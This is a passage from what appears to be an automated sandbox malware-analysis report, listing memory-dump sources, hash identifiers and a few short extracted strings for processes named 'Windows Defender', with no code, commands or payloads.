                                      • Instruction Fuzzy Hash: 4221A411B18D1A4BFB90BBEC946A3BEA2D2EF98712F24017AE00DD32C2DD6868014791
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0bab0b69d3ec359a008bb1292d6e8cbb90774e3e350705c7aca1e1d55fa3a03c
                                      • Instruction ID: 8cc7f5259cd4e477d1285524fe46dd4fad8a0d531e7dd0bbe5b736c9400e3460
                                      • Opcode Fuzzy Hash: 0bab0b69d3ec359a008bb1292d6e8cbb90774e3e350705c7aca1e1d55fa3a03c
                                      • Instruction Fuzzy Hash: 74218379B74B094FD799FBA8C0B96A97FA2FB98204FC08468D44DC3386DD746940C751
                                      Memory Dump Source
                                      • Source File: 00000012.00000002.2925402597.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_18_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a5d59f8934c2d12b7be19209e88ba771cc39a620c65db09eb2994b62bb640b50
                                      • Instruction ID: 5b2565933f8309aff73ab666f2b88677e51d29326f231a307d0054d7c12331d2
                                      • Opcode Fuzzy Hash: a5d59f8934c2d12b7be19209e88ba771cc39a620c65db09eb2994b62bb640b50
                                      • Instruction Fuzzy Hash: 07012B15E0CBD10FE796AA3858A55B57FE0DFD6311B080DBBD889C61E7D88C5940D392
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d391050a3de08c8fa124f2f31cdb3a5bce540ff69d697eb0a283031b0250654
                                      • Instruction ID: 1c16a1e6273c63af9682f70d399476ac03095f8fb0ed1aa9808795d60f12382c
                                      • Opcode Fuzzy Hash: 8d391050a3de08c8fa124f2f31cdb3a5bce540ff69d697eb0a283031b0250654
                                      • Instruction Fuzzy Hash: 2322A260B28A595FE7A4FB7C84A97B9B7D2FF99314F44057DE04EC3292DE2CA8018741
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b092d772f0456c5779322087e746479ce0d797adab1f593b221151b5c97ffed0
                                      • Instruction ID: 7ed3945f84b758f2a8f513b2f9ab1ce56c2e3c1a0262b7c331a0ea58966fb690
                                      • Opcode Fuzzy Hash: b092d772f0456c5779322087e746479ce0d797adab1f593b221151b5c97ffed0
                                      • Instruction Fuzzy Hash: 3071F412B4D7960EE362B6BCA4651FA2B95DFD6235B0841BFD4CCCA0A3DD0C68878791
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ae5e843f70794d22443d2ccbb20ac0f41573cadfc727960b5f38469e71a1e6a
                                      • Instruction ID: 1f432f9af8dcfeacce4b4b943b94d8b33c0009e1889e8b29a881efe4374a8f2e
                                      • Opcode Fuzzy Hash: 6ae5e843f70794d22443d2ccbb20ac0f41573cadfc727960b5f38469e71a1e6a
                                      • Instruction Fuzzy Hash: 9151F050B1E6C50FE796ABB858752A5BFD5DF87229B0804FFE0CAC6193DD1C1806C342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: a665208f2d38aba31b59fc36533e3cea1dda4cff9997137518371a34723b8ca7
                                      • Instruction ID: 500a5fd458433b7ada46cd96603cfba501043f55333d8727b0d649ba1cc8a114
                                      • Opcode Fuzzy Hash: a665208f2d38aba31b59fc36533e3cea1dda4cff9997137518371a34723b8ca7
                                      • Instruction Fuzzy Hash: 4D51F826F0D6960FD711EBACE4B11EA7FB0EF96229B0801B7D1CCDA193DD1868498790
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2O_^
                                      • API String ID: 0-2974816419
                                      • Opcode ID: 5fd4b814d4032bb2fed2bf80d1735549ba2676100a891fab86181ae80f3213fe
                                      • Instruction ID: 04af15a3eff337c1ce64d1b88a7bb7f6a351c9d33433bb07cbff9a7b3798d462
                                      • Opcode Fuzzy Hash: 5fd4b814d4032bb2fed2bf80d1735549ba2676100a891fab86181ae80f3213fe
                                      • Instruction Fuzzy Hash: 6951D526F0D6560ED751EBACE4A11EA7BB0EFD6229B0801B7D1CCEA193DD1868498790
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;O_
                                      • API String ID: 0-3800132730
                                      • Opcode ID: 2c3842cfd02a54bbee9fbc284bbac2273f2de97865d71fd8b5454aa000cdf38e
                                      • Instruction ID: 56f3662b0ee88158c7b1a1ab36bd7a64efe9bc3ad4b3264c6a822874165bb554
                                      • Opcode Fuzzy Hash: 2c3842cfd02a54bbee9fbc284bbac2273f2de97865d71fd8b5454aa000cdf38e
                                      • Instruction Fuzzy Hash: 8031E031A59B5A9BDB52EBACD0B95E97FA0EF95314F8044BDE14DC3382DE2868008B40
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18717d4e0fd85df64de7705046b2c6a270f10b58494884097310602a3c7683dc
                                      • Instruction ID: 54d7e1a095084e5292bf3690195df756e590dd0b5937403254314d20e571dfb5
                                      • Opcode Fuzzy Hash: 18717d4e0fd85df64de7705046b2c6a270f10b58494884097310602a3c7683dc
                                      • Instruction Fuzzy Hash: B631F522F18A4A4FDB51DBA8C8A51ED7BB1EF96210F4401BBD18DE71A3DE2C6C058390
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 793e7c8cc97219571e1c69c40db8a8cebf7689f4fc7ad5da0310468cc0b6c36f
                                      • Instruction ID: 53bd49af1311ce398d341bcae696eb0ebf2ee14baad352db1582c9edd072f1f5
                                      • Opcode Fuzzy Hash: 793e7c8cc97219571e1c69c40db8a8cebf7689f4fc7ad5da0310468cc0b6c36f
                                      • Instruction Fuzzy Hash: 3251C836B48A2A4BD710FBECE4656FE73A4FFD4329F44453AD108D7282CE2D64458B90
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3ffafc537da4a99782facd3a7f24e924eb9b65355789820a7b62a8de940231d4
                                      • Instruction ID: 75d4f01693a3a763ce5830400d003965c2f60860cf32f02284508ce6953afcb9
                                      • Opcode Fuzzy Hash: 3ffafc537da4a99782facd3a7f24e924eb9b65355789820a7b62a8de940231d4
                                      • Instruction Fuzzy Hash: D141D636B18A1A9FDB40FBA8D4656ED77E1FFD4315F50053AD109D7282CE38A8468B90
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cb4baa45ebee5e9388f65666893c8758f39ea53c8c881a50f5998e4a163e3a2b
                                      • Instruction ID: f0f9fbb252b7d90a713b26ebc09be3dcc5593980de3f6c541e75eac44d7715fc
                                      • Opcode Fuzzy Hash: cb4baa45ebee5e9388f65666893c8758f39ea53c8c881a50f5998e4a163e3a2b
                                      • Instruction Fuzzy Hash: 36317521B1D9490FE798FB6C946A2B9B6C2EFD9315F0405BEE04EC3297DD68AC418741
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acb68e1d694795412812e15402e448f4c8ef3a73163a21b3168e75216e698645
                                      • Instruction ID: 943b3d2735b0ca76a00ae08db951566076191f607414fe615d336e2e538aeb3e
                                      • Opcode Fuzzy Hash: acb68e1d694795412812e15402e448f4c8ef3a73163a21b3168e75216e698645
                                      • Instruction Fuzzy Hash: 5321D811B18D1A4BFB90BBEC946A3FEB2D2EF98712F10017AE10DD3283DD2C68014791
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ecf9d758ccae1c26e5eebf809d07c7280d8c2af95cef853e34923e5503c24fe8
                                      • Instruction ID: c1eca76e4b9de0a8a24479379f6e520130cdacd921b54483f47a325a3a0017fd
                                      • Opcode Fuzzy Hash: ecf9d758ccae1c26e5eebf809d07c7280d8c2af95cef853e34923e5503c24fe8
                                      • Instruction Fuzzy Hash: 9E219235B54B095FD752EBACC0A9AA9BFE1FF98304F8044ACD54EC3386DE3469018B41
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.3007713087.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_7ffd34660000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ccabb6f9313ce47387222a860258b6dd95d1a1ee6461721cda0d08c6348906ae
                                      • Instruction ID: 34452d1318adb014e69a8ad62243a15f6cafb3dbb8acf2469a709be15c1ddf2f
                                      • Opcode Fuzzy Hash: ccabb6f9313ce47387222a860258b6dd95d1a1ee6461721cda0d08c6348906ae
                                      • Instruction Fuzzy Hash: 24014710A0DB910FE742AA381CA91B17FE09BD6321B0808BBD889C60EBD80C59409382
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8eeccb5d1a26a81531d97f89552ea3ed978dd11230d9bb674fec4ed7c54c5a34
                                      • Instruction ID: a777ef6ad615fab57a15e24d195e843402e6940dbd6174de86333fec86952655
                                      • Opcode Fuzzy Hash: 8eeccb5d1a26a81531d97f89552ea3ed978dd11230d9bb674fec4ed7c54c5a34
                                      • Instruction Fuzzy Hash: 59229261B28B594FE7A4EB6884A97FA77D2FF9D301F440579E44EC3283DE28A8418741
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f812544630abda3f8b31c3888ba62b6e24cb81d56b1ecef15c1949e22616908
                                      • Instruction ID: 152a2d6f43a4fbf7b68039a7b62b8958a51d870c5824c3f5c2a86796e872fc72
                                      • Opcode Fuzzy Hash: 2f812544630abda3f8b31c3888ba62b6e24cb81d56b1ecef15c1949e22616908
                                      • Instruction Fuzzy Hash: 46713612B5D7960EE362B7BCA8651FA2B95DFD722570981BBD0CCCB1A3DC0C28478391
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cd9e1deb90926d50bcc1f139e807bf6cde4e9d4065436603642fc41b84699a8b
                                      • Instruction ID: 2b359268038d6fae39a8e39ba80a9758089828c3dd1f3dc1dd6e9e286b820c2b
                                      • Opcode Fuzzy Hash: cd9e1deb90926d50bcc1f139e807bf6cde4e9d4065436603642fc41b84699a8b
                                      • Instruction Fuzzy Hash: 2A51F010B1E6C50FE796ABB898B42B57FD5DF8721AB1804FFE0CAC6193DD581806C342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;M_
                                      • API String ID: 0-2554412826
                                      • Opcode ID: b67610c5bba621a9cb739e4e3c8cb39dcb3f14de728dd11a76b674b1071f6514
                                      • Instruction ID: 9db6e178cc7243905bab6260aee0972306f1006b7fbe890292294023be714008
                                      • Opcode Fuzzy Hash: b67610c5bba621a9cb739e4e3c8cb39dcb3f14de728dd11a76b674b1071f6514
                                      • Instruction Fuzzy Hash: E531C471B4DB5A8FD762EBA8D4A51EA7FA1FF9D206B4144B9D04DC3383DD3868408B81
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b914b6649e16ace1413cdb5ee18066fc7a0f12288609fe062e2165d7336dc00
                                      • Instruction ID: 0782651f91ba3fe7e8931e14f1e6a4529b181a921d0e305d710477e56561b387
                                      • Opcode Fuzzy Hash: 4b914b6649e16ace1413cdb5ee18066fc7a0f12288609fe062e2165d7336dc00
                                      • Instruction Fuzzy Hash: 4731CF62F19A5E4FEB819BA8C8A51ED7FB1EF9A201F4502B7C189E3193DD2868419340
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9588ca1bddf220a90a03c058ba20098c7c258c9006d155f4588ceb53fefddb0
                                      • Instruction ID: 714e039ef3622275a7a61779bee8bbd0b14fc57a874eedd76ca065daf0bcf61d
                                      • Opcode Fuzzy Hash: c9588ca1bddf220a90a03c058ba20098c7c258c9006d155f4588ceb53fefddb0
                                      • Instruction Fuzzy Hash: 9D51B936B09B2E8BDB50BBECE4611FE73A0EFD5326B15067AD148D7283CD3964418790
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9af3642992f7915ddcfdd97a8d13432740bf579f90f6d546ed8a5ee2c8b38f5d
                                      • Instruction ID: 0613d256793cde967399b649737c6037e26fc2c8ef9a309a23815c2509554114
                                      • Opcode Fuzzy Hash: 9af3642992f7915ddcfdd97a8d13432740bf579f90f6d546ed8a5ee2c8b38f5d
                                      • Instruction Fuzzy Hash: 2E41D636B19A1E8FDB54FFA8D8616EE73E1FF99316F50067AD009D7282CD3964428780
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2929f8022d2bbc177311f713119a7683b7fcf962cd123de198dbc1b22be8a4b
                                      • Instruction ID: 76a9a148c6353473f8bd70b0d8da3396599fde6c9f57e96ff5c2c96bb1197a61
                                      • Opcode Fuzzy Hash: d2929f8022d2bbc177311f713119a7683b7fcf962cd123de198dbc1b22be8a4b
                                      • Instruction Fuzzy Hash: 8331C521B1D9490FE798FB6C946A2B9B7C2EFD9315F0405BEE04EC3293DD68AC028341
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e034130c7a9df2124f89fe274d0bc0f8588f863390713655f1c44130cacda14
                                      • Instruction ID: 3be54c26aec150211bb1910f33b6bbebe2c7e1d983d58367c55f85736e082900
                                      • Opcode Fuzzy Hash: 0e034130c7a9df2124f89fe274d0bc0f8588f863390713655f1c44130cacda14
                                      • Instruction Fuzzy Hash: 9121B262F1491E4BEB94EB98C8A52FDBBF1FF99311F410276D14EF2292DE2868419740
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a2e89406b487610b84e83c18ccd4167b732de7354e35961d3489176960bf840
                                      • Instruction ID: 33e4e16cca5cdef36a18a4e58bce8167d6301328fc1e12324fed554ee22c08ff
                                      • Opcode Fuzzy Hash: 0a2e89406b487610b84e83c18ccd4167b732de7354e35961d3489176960bf840
                                      • Instruction Fuzzy Hash: EB219912B18E1A4BFB94BBEC946A3FEB2D2EF98712F14017AE10DD3297DD2868014751
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9d554aefe781239c90c97737bef5426f5ac683424b70dbd9c7a1b84e49551a14
                                      • Instruction ID: b9a9bc31fe23c393e6ad9061756a5fe733fada8549d6fdc6b738cbdb3613789d
                                      • Opcode Fuzzy Hash: 9d554aefe781239c90c97737bef5426f5ac683424b70dbd9c7a1b84e49551a14
                                      • Instruction Fuzzy Hash: 64219275758B498FD762EBA8C0A16EB7F71FF9C206B8144A8D44DC3387DE3869008780
                                      Memory Dump Source
                                      • Source File: 00000015.00000002.3085389751.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_21_2_7ffd34680000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c8b13a49e16a7cd8c544aa31db8f4cdf2e7041dd6c6b8a24cbb03cabf0cab55
                                      • Instruction ID: 6739d0db5623bc3b143839062810cba9bf5e14e920b77f60a35f44ac2799a55d
                                      • Opcode Fuzzy Hash: 9c8b13a49e16a7cd8c544aa31db8f4cdf2e7041dd6c6b8a24cbb03cabf0cab55
                                      • Instruction Fuzzy Hash: 43012B55A0DBA10FE7D2AB3898B55B17FE0DFD6211B0809BBD88AD61D7D80CA9409392
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 781c917a8f9baa450e3e0eec86d3caa30e57d139944b454fb5a7a0c34df30920
                                      • Instruction ID: b48da2590edd8db1c641f22e1c6db2e650644c7a63a800132863a4e6315f1469
                                      • Opcode Fuzzy Hash: 781c917a8f9baa450e3e0eec86d3caa30e57d139944b454fb5a7a0c34df30920
                                      • Instruction Fuzzy Hash: 2022C371B28A5A4FE794FB7884A97BA77D2FF99300F540579E04EC32C6DE78A8018741
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53b8bf492868041f1051301dd66a5c0881b34da142cfb522bf5fb735b3b7e956
                                      • Instruction ID: 0164f0f5e34f2582d3b842993cc3e960742f28112d901dea354c836c3983b850
                                      • Opcode Fuzzy Hash: 53b8bf492868041f1051301dd66a5c0881b34da142cfb522bf5fb735b3b7e956
                                      • Instruction Fuzzy Hash: F081F412B4D7960EE362B7BCA4651FA2B95DFD6235B0840BBD0CCCA1A3DC0868478792
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f1f8f3f38bcd5e399b473d4caf070388347ef110d13b1d2cc4dfd94f31af3db
                                      • Instruction ID: d45ce556143b85f489e8c7ec5ca27c65364a4c783d39f34eabc325220ecb69fe
                                      • Opcode Fuzzy Hash: 0f1f8f3f38bcd5e399b473d4caf070388347ef110d13b1d2cc4dfd94f31af3db
                                      • Instruction Fuzzy Hash: 0E51F010B1E6C50FE796ABB858B52B57FD5DF87229B0808FFE0CAC61A3DD581816C342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;L_
                                      • API String ID: 0-2770409130
                                      • Opcode ID: aff1998971c27cb66a99139e117fd027cf0a8774ff3472aad181b7c684a9268e
                                      • Instruction ID: e76467c2ca35c9376617acff5ef0902fec642dc6556afd485262d258ad005a7d
                                      • Opcode Fuzzy Hash: aff1998971c27cb66a99139e117fd027cf0a8774ff3472aad181b7c684a9268e
                                      • Instruction Fuzzy Hash: 1D31D131B4974A4FD751EBE8D0B51EB3FA1FF9A204B8040B9D04DC7386DD3868488B44
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d3fb4a5eced818545a2a0d336c09575f32905091e5934a007327b84098f4aa39
                                      • Instruction ID: 5e489864c63e30c8a19a1f942cfbfa5dc1dc108d4d9f9ea91e432833488faa0e
                                      • Opcode Fuzzy Hash: d3fb4a5eced818545a2a0d336c09575f32905091e5934a007327b84098f4aa39
                                      • Instruction Fuzzy Hash: 9331D062F09A4A4FEB55EBA8C8A51ED7BF1FF96214F4501B7C049E3192DD686C068380
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a1bb2009e6c250bb63cfa9f091e3df75c52a056c33b44b1d2df52cb9260c9d6
                                      • Instruction ID: 0f85d09144c45494e8db770f508488fc03fb40a2f9be3200286fde10faff9379
                                      • Opcode Fuzzy Hash: 3a1bb2009e6c250bb63cfa9f091e3df75c52a056c33b44b1d2df52cb9260c9d6
                                      • Instruction Fuzzy Hash: 3751CB32B0CA2A4BDB51BBECE4A11FE73A1FFA5329F54013AD148D7297CE3964458790
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a83acf92088ac1adfcc9c6f7150f0d32ab93028f6828cbc5a401e631eca3047f
                                      • Instruction ID: 2956bb464d8d138b9cde8bc87167dfac477c6c1e7c97fd17d1c78e3aefe58381
                                      • Opcode Fuzzy Hash: a83acf92088ac1adfcc9c6f7150f0d32ab93028f6828cbc5a401e631eca3047f
                                      • Instruction Fuzzy Hash: F041D736B18A1A8FDB44FBE8D8656EE73E1FF99315F50013AD109D7286CE356446C780
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8328e4d11cd324af2e15ab08d1383fa8d2f5a1c37a1e71fe2d6d96ccd0956ad5
                                      • Instruction ID: 7c027a1d1e659e7f8c192f5acb9a2dfd75a8567fc798fbff0defdf07e08f3448
                                      • Opcode Fuzzy Hash: 8328e4d11cd324af2e15ab08d1383fa8d2f5a1c37a1e71fe2d6d96ccd0956ad5
                                      • Instruction Fuzzy Hash: 66318721B1D9490FE798FB6C946A2B9B6C2EFD9315F0405BEE04EC32A7DD68AC418741
                                      Memory Dump Source
                                      • Source File: 00000016.00000002.3359779357.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_22_2_7ffd34690000_Windows Defender.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
